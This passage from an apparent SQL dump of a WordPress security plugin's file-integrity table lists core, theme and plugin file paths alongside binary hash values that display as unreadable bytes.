,�ֻ^�,��>� 0,�B/�f&��\"','',0,'?'),('I��ƶ##�T]�d�','wp-content/themes/relia/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g��L��','�Hg�L3�,8�Ka�V��V\Z�V�H�=��3<a�','',0,'?'),('I\n�\0���Q7��x_B','wp-content/themes/lightly/css/ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�\r5���YvK�','3�\n� <�L�f\n�f?xԸ<��}r��ͤ','',0,'?'),('IW�9�a��W��3(','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q\r���rY�VU�f�','��[����핚���\"�M��t��&yָ�IC','',0,'?'),('Ic�M��>U5�ٱ��','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/accordion/static/js/scripts.js',0,'��ƒ�u��ͼ6]w�','��ƒ�u��ͼ6]w�','T�O��ڑ�4=������8=n6^z�;���','',0,'?'),('I�:%r��:�n~�4�','wp-content/themes/tortuga/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�[i��P%q��jƗ�','�_����5Usx�����D�y����� s}���','',0,'?'),('I��Y��;�o(�','wp-content/themes/supernews/acmethemes/core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tt�3���ӓ&,\'�','�z��_�\'�Z�l<[���[��-��]ɬ.�','',0,'?'),('I0��S�$2�T�B*','wp-includes/widgets/class-wp-widget-calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y	N��ɔ]7l�','M�>����f(E���r_hX���oۃ��8@�+O','',0,'?'),('I6.:\n(��i\0B��','wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H\r\r�0�X/^�0R','O��1�-p�Qۊ��8�Z+�$[��j���K��','',0,'?'),('I6U�\r7����3p�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h<��|�7b����','��_�^F\"��;+r&Z~ӦQ����|�5�','',0,'?'),('I9a�|n��X�S��X�','wp-content/plugins/wordpress-seo/admin/views/tabs/sitemaps/exclude-post.php',0,'��\'	��/j�0�g��','��\'	��/j�0�g��','��!�6S`wa���8<:\\L�x������f','',0,'?'),('IT�9(�`�d�!5-','wp-content/themes/clean-magazine/inc/widgets/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M��Nj���]�3','c88JV���kl���k_�\'�K4,�%w8v��-\"','',0,'?'),('IY�Ax���D�v\0B�','wp-content/plugins/all-in-one-wp-migration/lib/view/import/pro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�=2W|�͢/q9','f�1��̥�7+7��[+�\\7IxN,�y�K','',0,'?'),('Id�tB#0p\'�[\0(��(','wp-content/themes/the-minimal/images/comment-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3vS�p���\"H�:�~',')?ɋ��$���-Y	M�i���m�EH17M','',0,'?'),('Iu�$�j=�sŗ��a�','wp-content/plugins/all-in-one-wp-migration/lib/view/main/backups-index-html-notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�^B�͚�R=\'�W�','H�=L��Ԋ�U�/�����k:�����S�','',0,'?'),('I��:Bs�#���@�','wp-blog-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_BZF1���y����)',';\Z�/\\b���t���I���͝���h��w�','',0,'?'),('I��P��n�','wp-content/themes/hueman/assets/admin/img/hueman-addons-100x100.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?a\r�d���R{�v�ǃ4','�S�	��y��O�M�la��R}��X��GBB��B','',0,'?'),('I��\n�{�<ZO���g5','wp-content/themes/alpha-store/lib/welcome/js/welcome.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OۿI����T��~TU�','T�0Z�rv��x�6�)`�5fK��~)��4%�','',0,'?'),('I�Ԭ�l��v0O','wp-includes/js/dist/core-data.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|v(/�I��܉g','Ν�cv�j^l�U�~��T�b��R�<5�\0��;','',0,'?'),('I�PE�Xt�FH�%�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\0��Lv�[c��)?','�C�h!݀F$�}�wd�7b(�!�p�IF.L�','',0,'?'),('I�Ѕ����M�Uch','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/static/js/transition.js',0,'*��M]�р��B��','*��M]�р��B��','��0Q����_��+ o�7��k��.�*','',0,'?'),('I�V/��6�s��','wp-admin/js/editor-expand.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','´R�[��6\\gTԄL_�','�vI\n6��6��%VG��}����@of�e;','',0,'?'),('J�%.��~�—q�l�','wp-includes/class-wp-text-diff-renderer-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'S��\"|���k','�t�U�@-����R<G�i\rm˻5E�%f�:','',0,'?'),('J?#�͌$M�7�c�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractPlaceRecord.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�I.:���`PR�','#z��R�\ZHU���>B�nP,���\'�eT�tߺ','',0,'?'),('Jf�3?���_r�C�','wp-admin/images/w-logo-white.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n���Jvۢ~�y�\\�','n��D��� _�;�!G�םcV�0M9i�=�','',0,'?'),('J��E[�7U��\Z�~','wp-includes/js/plupload/handlers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O��	�~�5��8�ͫ;�','�	�\n�Z\rZ�B�[9��z��S)��4M%��','',0,'?'),('JyQl��D�!�HV�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-bot-protection.php',0,'�я���\"\Z�L\0�+�','�я���\"\Z�L\0�+�','AC���׀��7�ŮEo�4���ٖ�q\\{','',0,'?'),('J\"�[j?���j��k�','wp-content/themes/relia/inc/images/camera-loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.)���u��m���','QǬqu|ā�::��)xE�=�%�Xd-)9��','',0,'?'),('J\"�Ғ\r-��\"ʇw','wp-content/plugins/unyson/framework/includes/option-types/datetime-range/static/css/styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BD��v\"���E<Zv�','��))�a�ũ�da)�5G\nJ\Z��K=i�','',0,'?'),('J)5��B�w[¸}�7Ѧ','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.lu.php',0,'O9`��bZ�l(��UM','O9`��bZ�l(��UM','���탧�h5{Eџ���_/��XF=�+[�h�1��','',0,'?'),('J6\"����{)�{��|[','wp-content/themes/sg-window/inc/css/page.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�J���\'˓\0��','�Xm��l�m�ŕf͋h�B��;�cMK$��','',0,'?'),('J8�E��Dh+���F','wp-admin/js/site-health.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J>/=��H��r��\\�','�pY$�#��v�qY���8\nn#�>䮂��!','',0,'?'),('J:�$IT���b�$k�z','wp-content/themes/the-minimal/images/search-icon2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XHT6�DhQ՜���+�','���3������X־�O,��IB�9,�h','',0,'?'),('J?�\0O�(����|c�','wp-content/themes/hueman/content-standard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�҉���\"z&{л','�%�Ds�B{�3EqN���w�~&�K���G:�','',0,'?'),('J?��4�Y��h�e!>O','wp-content/plugins/contact-form-7/modules/submit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')B���yC2��P��J�','ʸ�f�f��)ӏ.qC�RX����Z���p��]h','',0,'?'),('JN���(�֐�Q�w�','wp-content/themes/skt-construction-lite/images/sidebar-arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��n�����:i�','�D�w�E�.�u8s��(P�=D4{�����','',0,'?'),('JO�\n�z�E��=٪��','wp-content/themes/hueman/functions/init-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R3FQ��UB��0#�h�','Z�[���IN\0��i�[4�S0�����`�p]7','',0,'?'),('Jl���1������','wp-content/plugins/wordfence/models/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E\"xK��{�8�dS�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('Jmj��@BL9��M�WO','wp-content/themes/square/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�t����U� \Z��/�','��+C�)╚�?\"�$����eZ^8�n��','',0,'?'),('J{�ֹZi^ùx�I','wp-admin/media-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�?��T���i�\"=','\"��On]O�k;��Y�}��rG��yf�%�O 8\\','',0,'?'),('J�on���U� Q�\\','wp-content/themes/travelify/library/js/customizer_custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��	�e�<�\\��Xf~�','�w:�4�ZH����y(��A��f{^Z/�R�\\�','',0,'?'),('J��$�MU	�h���O','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/sliders.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}�U4PJ���LI�','�n1p棟8x��S�� �]�hB-uC�r��e�\r','',0,'?'),('J�>����\"��/','wp-includes/Requests/Auth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1��R��W��ÔO[��J','bO�Q�wù�LѠâ��������9Q��lrl','',0,'?'),('J��\'g���N<?�	8','wp-content/themes/alpha-store/lib/welcome/sections/contribute.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\3,���a�T����','���e�f]�BV\'��jVYvH]o6Wb�<g�P�','',0,'?'),('J���+r���D��','wp-content/themes/skt-construction-lite/change_log.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	.nU�\Z�dh�3S��','��2e�/�毠�˽Z ;�>e������g��','',0,'?'),('J���W0t<�W��','wp-content/themes/vega/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����M���橵~7','mm�~�.��[2��/c�&q�zSO7	fI>8�h','',0,'?'),('J�����Ǵ�Ծ�c�','wp-content/themes/twentynineteen/images/pattern_01.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�;�QB��X����','��(��3�g`&}�5)�s��}me2�G��[�','',0,'?'),('J��;���P`�Ց^','wp-content/themes/fabulous-fluid/images/grid-img9.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h�O��Ne԰p�','l�ν��Oޤ�<7q?��m�\'a�#i��։శ','',0,'?'),('Jլ4��\r�n���','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�\\c7�y�x�гl','�~��qV����*\'�1�����]3�^�����m','',0,'?'),('J�3�I���5��D�Z','wp-content/themes/clean-magazine/inc/customizer-includes/clean-magazine-customizer-news-ticker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U|�M��\'�޴b��7','�n�E S�����D���\Z7j�EU��Ö��','',0,'?'),('J򾁬��Oh��sDؾ','wp-includes/js/zxcvbn.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|	���#PV	/{�M�_','v�XI�9��n�1e�6��C�\\�.p+�\"��K�','',0,'?'),('Kp� �k�!�X��&�','wp-content/themes/fluida/admin/images/image-style-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;^B_�1�^�ŜZ�Q','�Ub���l��R�Ci lS��(�O�/�?','',0,'?'),('K�,��<�fƑY�','wp-content/themes/twentytwenty/inc/custom-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K���<���ȝ���a','ߌ녔B��J+�f�,q*�WC\"^_�V\0.s�@�','',0,'?'),('K���ߺ�b�','wp-content/plugins/wordfence/lib/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���z�x��C�}','�Nܓ�#d�t�B!\"M՞�==�@o��','',0,'?'),('K%,�*2��*�G5�','wp-content/themes/barletta/inc/template_tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yh���O��f�����','��]0A������6�Ԋl������V��;�WT','',0,'?'),('K0���\r��ܐcn�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�29Y¿,E#�/����','� � ��h<)s��>-P��{���K���I�\0��','',0,'?'),('K>�^[�P�F�1�h:','wp-includes/blocks/social-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n��:�R�$3�G�','��!3�ދ��� E�l�Y晘��!��\\��','',0,'?'),('KI�ع�w$�ѻ�#���','wp-content/plugins/spam-captcha/js/elycharts.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���M��릍\r-���','����Rʷu\r�щ,���~`��Mw��ʢ�)��s','',0,'?'),('KKOf�Sd�iB0Ov��','wp-content/plugins/wordfence/views/scanner/scanner-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\j�6Ii��\\u�v','\"9t��Y?�²�L���ykg������=�ۢ�','',0,'?'),('KQlx�U�KV���t�;�','wp-content/themes/nirvana/admin/admin-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`<���/�r�8��n�^�','(�B\"�L0���fFV���@�wPvr5Դ��A���','',0,'?'),('Kq�����B`��7�z6','wp-content/themes/vega/assets/fonts/glyphicons-halflings-regular.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�4�mi�)z�d�:��','�s-N=ip��f�7{��άTO���@��x�<X','',0,'?'),('K�V�$?7��W���j�','wp-content/themes/panoramic/template-left-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r��OWUf�Mz%�6�','����~���N�!]}��aؗE���V�)�Sm','',0,'?'),('K�nҋD&sR�WU(�','wp-admin/css/farbtastic.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�^�:�G�(���:k\n','4��7V�f�� �/��������D��W3p','',0,'?'),('K�i&k�\"���t','wp-content/themes/skt-construction-lite/languages/skt-construction.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��5�F���au��','6�>�Q�J�DI�-y��Ԟ�v�DD��E@z�ON','',0,'?'),('K�c�G��5�U�&]:','wp-content/plugins/all-in-one-wp-migration/lib/model/import/class-ai1wm-import-confirm.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8M�r�;�fa��U�','r�o�Q-\"^�#� �nD\'�B��s�/','',0,'?'),('K�c��#2s�/(�\"�','wp-includes/widgets/class-wp-widget-pages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�E,��ߓ%_�','<6�8��1J�ߧr(;�c�?@�|uR�\nŞ�','',0,'?'),('K��<�H<7�E�,l��','wp-content/plugins/wordfence/views/waf/options-group-brute-force.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�p�k�<���#Y','Qx�b���nbWK����E*�l�o��ޅ��ʛ��','',0,'?'),('K��cE�j��zeů�8','wp-includes/block-patterns/text-three-columns-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�tH�W��%���','ޗ��غ�Ku�\0M�x>]Z�\"�z�8Ŏ�V','',0,'?'),('K����\r\\Uz��\Z:\'','wp-includes/sodium_compat/namespaced/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�*��F谯��<��l','�®�R�l�U�����wz�ank��G�t�3�','',0,'?'),('K�<[�$��ib��W','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.ip.krnic.php',0,'?�A�cF-�v��Z�s','?�A�cF-�v��Z�s','%���0|���T<9f��*�gF㇘�','',0,'?'),('K��]C��l7:�D\0','wp-admin/js/widgets/media-audio-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P IM�;p8vn��[�S','����9j��lxB�eH:�y�%}�c	TP�_�','',0,'?'),('K�9�kpa¬�b�','wp-content/themes/panoramic/customizer/customizer-library/extensions/preview.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K��⠡5I���e','ӱ����T��n�����ًr6w��,�z�pK^','',0,'?'),('K�Lx<C���H��e\Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�EN�Ăۛ(\n�n','����Ѭ}^�EF����>��ڂB��','',0,'?'),('K��[��n$Z�j �G�\0','wp-content/themes/nirvana/images/columns/nirvana-column3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�m���%E��G��9�','ס6��`���T���$Z|\r�l��s/�ڬN','',0,'?'),('K�.����=q�%��','wp-content/themes/square/languages/sr_RS.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4x����\n�\n��B_�','�t�h%�/Xc��)L�.k���)u��Z�gP','',0,'?'),('K�\"�}ڀ�|#h/%','wp-content/themes/fluida/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�o��\Z�_V��','	�6K�u�N���?(.\n��Y4��Hc���','',0,'?'),('K�4��ַ̀&��*�	','wp-content/plugins/all-in-one-wp-migration/lib/view/assets/css/import.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���)���C:>R�','<\r›\'S�����#��n7j$v�X\\Ƿ�X=U','',0,'?'),('K� ���*�;ܼ�nc','wp-includes/blocks/calendar/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j��8sH�<r�:','ڽ����\\Vu;e?�i�n$/Jw�	͕=�p��N�,','',0,'?'),('K��W�&\0\0K�\06�G�','wp-admin/js/set-post-thumbnail.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':1N�(�xl�X��\'','v9�\n{lK��~q�#�>��ߦ��� J�`~','',0,'?'),('K�K+�2�	aeZ�e','wp-includes/class-walker-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I#�h�Z~�����@��','�Xs�W��l����:\"��0����;����LL','',0,'?'),('L��������`I�G','wp-content/plugins/contact-form-7/languages/contact-form-7-gl_ES.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� <���86�L@!�	�','e��S,�\'}A7���_s�|`q���:1�7h�','',0,'?'),('L�ͅ\nw���Z,�^3','wp-content/plugins/spam-captcha/lang/spam_captcha-nl_NL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';j��D8�K���eW7','���פ��	G�͘��@Y��l�U�\Z��','',0,'?'),('LLr9��7�e�s','wp-content/themes/tortuga/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T��v%��L-��-','���h��\rT*[N���YB΂�g�W�w��','',0,'?'),('L<#���\Z����}','wp-includes/js/tinymce/skins/lightgray/img/loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9K���M�:�Tf�9','��;���T��O`(6��,�sk�Z���c�R��+','',0,'?'),('L uk�ơs�p]��','wp-content/themes/clean-magazine/css/genericons/Genericons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�ld*�Z�����b�','(�5�\\&HFI7l24=}`�j�V����Bj4)�','',0,'?'),('L �P��A�^��\"�8�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.onlinenic.php',0,'Xb��Ҵ�W7��B�~D','Xb��Ҵ�W7��B�~D','�.㒁M��!�_�1�.\Z��{6�o&$e��PH','',0,'?'),('L �\'�V�N��{�S~b�','wp-content/plugins/wordpress-seo/vendor/yoast/license-manager/class-plugin-update-manager.php',0,']��2��G�A���',']��2��G�A���','�.w?�[\r�ͯ�&*�ۄ7V6O�0=��0�$','',0,'?'),('L!8�G-X3q�ڬ�\\','wp-content/themes/panoramic/customizer/customizer-library/extensions/interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@k�	m�A��Z���','����;��hyݖ��\rO\nK�>��N!*[��','',0,'?'),('L#��/۰*�3���\r','wp-admin/includes/class-wp-terms-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R��ω�>��QoS�','J��EE��ty>S\'D�jJg����?�Iʁ�','',0,'?'),('L(��n�9[2�C6�','wp-includes/js/zxcvbn-async.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E��\nO\\��Y�b','��\'FP�\Z�/G\n��J����\\B��\Z��IT�','',0,'?'),('L;l�z~�������1�','wp-content/themes/nirvana/fonts/sourcesanspro-bold-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&C�/��/�5Y�Ql@','snh�R�\rJ��kOcb��y㪙C0���','',0,'?'),('LF�C�w� �ձQy','wp-content/themes/fluida/admin/images/2cSl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k�S{m�`Z�;�','La�2Nӥ�]���)1��&��>^C�2�$�','',0,'?'),('LR7Q��ToG|�{','wp-content/plugins/wordfence/lib/viewFullActivityLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�>��&Q)�Fy�k','e�i�p��r9ݴZ\\�\\Q~`�?�7�=�R�','',0,'?'),('LaI��Yr��q%@�|','wp-content/themes/wen-business/inc/metabox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r�_�A��D0U�','v���,\n�0�\nu�th��\0�lK���X\r','',0,'?'),('Lap���8g�V�,��g�','wp-includes/js/dist/vendor/react-dom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��InV��9����','LrJ�#��6h����\r�ȴD�R5��b:uM','',0,'?'),('Lf9����b��y+1�','wp-content/themes/point/languages/point.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n2/c��HF��H�','�[)O��V�+\0ַs�02%)�^b��ԑ��5�','',0,'?'),('LpNb�`����B�\r��','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/auth/Google_PemVerifier.php',0,'Ԁ���/$7�L��8','Ԁ���/$7�L��8','���M��z�S�o.{���RjR���:n�c=�','',0,'?'),('LsЇś\n�c}>�K��','wp-includes/css/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l��][9�g�?��6>','��z�ɝq}J��n�/���4)L�,��Z','',0,'?'),('Lw+��$�4|�ns�w','wp-content/themes/twentynineteen/template-parts/content/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'�r�W���\0�Z�V�','�~WC�W�X���בh�,r�ە\r�$���qd_Y','',0,'?'),('Lz����Z��#�<','wp-includes/class-wp-locale-switcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"�?�F�w,�T��','!@�B��<6�ꁒ�Ku��Pm=��+�/c_�','',0,'?'),('Lz&mL�\\��H���','wp-content/themes/morfeu/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�(:�i�\\q[#};','�ja�g�RΫ��<���y2�q�n�%4\0K9�p','',0,'?'),('L�e<��N^#6㵔�T','wp-content/themes/fabulous-fluid/fonts/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!p���w���&h','X�\n}�l�//���C��;N�YTV�|t]Yb��','',0,'?'),('L�\'�P0������','wp-content/themes/sg-window/inc/admin-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','İ�?	�e�>y;u:�','�}M��%��3&Ǔ�l�Hqw�RYW�M4:�=��','',0,'?'),('L��i͆���eŒ','wp-content/plugins/wp-date-remover/public/index.php',0,'��{J!u?}��s�','��{J!u?}��s�','Aũ���`�9�7}b�>MH���JHh��|Fj','',0,'?'),('L���GM��G�B','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_forms.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dNo�p���J\rl�','��\\X�@+�)�a����ÿj��j�A�x�d��','',0,'?'),('L�;5�.�P��)f�N�','wp-content/plugins/all-in-one-wp-migration/lib/model/class-ai1wm-extensions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��aaxp\r���=�','������:�и7�%��b!�FA�>��','',0,'?'),('L�B�Ʃ㱢�G�Ua','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/home.php',0,'�����c�´\0��','�����c�´\0��','\\������+y!3�:w�!��qJ\'����?!','',0,'?'),('L��e�t\"pc(	�e�','wp-includes/wp-db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�FJY<\0�<�~��','`��t��I\01�Jx��E$���q�ٷQ�','',0,'?'),('L�‚Fh�J�i����','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.parser.php',0,'�ZM\\84D�](U��H','�ZM\\84D�](U��H','�G��gD���z\\��zH×��V��9�z��','',0,'?'),('L�\r�%��{��','wp-includes/blocks/social-link/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��qt_����`\r�','آ)0�� ����\\�ܼ~��-�\'��','',0,'?'),('L��df�i�X.���\\','wp-content/themes/vega/sample/images/recent-news-3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+T�R�uM���ҽJ�/s','��Rk^N���jT�Ż [,���`��^��2','',0,'?'),('L�\r��Ȧ:��n�h\'','wp-content/plugins/akismet/_inc/akismet.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�s��r�\n�c�J(','����ra�H�\n��}`�R��N��|���:G','',0,'?'),('L��ϖ\0�y\"P��','wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-bg_highlight-soft_75_cccccc_1x100.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`\0�\0���K¿Ra','�q)����$u�x��ldkȠ�lъ+H%}','',0,'?'),('L+q�V�;�h��Y�','wp-includes/fonts/dashicons.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M���N:��\'�ʤ��ȹ','J��!�����XLl`�e��O��s�H����','',0,'?'),('L�>t���N�����','wp-admin/css/colors/blue/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5Iה�g,)Z�YM�','�\\k��S�뚑�n wW��	�!�*�~�v��','',0,'?'),('L��)��a$�D-�Ӯ�J','wp-includes/js/tinymce/plugins/wplink/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��3���ܖ3��M','z�N\'A�%�S��@4�U���BD���q����','',0,'?'),('MSx�_1�n>��;��y','wp-content/themes/clean-magazine/js/source/jquery.sidr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�``\ZZj���,��','���u/���s����$\r���Ua�J��\Z','',0,'?'),('M	~��P�z�h۫','wp-content/plugins/unyson/framework/static/css/option-types.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϸ�_d�e,�=4D1','�&NI5��X�@���D�KƊ)QW�/���?n��','',0,'?'),('M	�O�8Rj��u�','wp-content/plugins/unyson/framework/helpers/class-fw-wp-filesystem.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����^�Ӯ2l���Z','��U^? gC���lJ��W�=hy�%B��U5QT�','',0,'?'),('M2g����f�Om&�','wp-content/themes/panoramic/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#ئǾ,wp��vm�d�','y!E��)c���\n�fc��e�7א\Z�����v','',0,'?'),('Mx1NjTm�R_2o','wp-content/plugins/wordfence/views/dashboard/global-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˫\'�m�`�0>�+#��','���������p������Pv?Z�F��QQcj','',0,'?'),('M\"�\'< �y��B��','wp-content/themes/accelerate/sidebar-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!t9����X�4]','�l�/;d�S�+�\\S��fw�	����؟��\r','',0,'?'),('M1��/�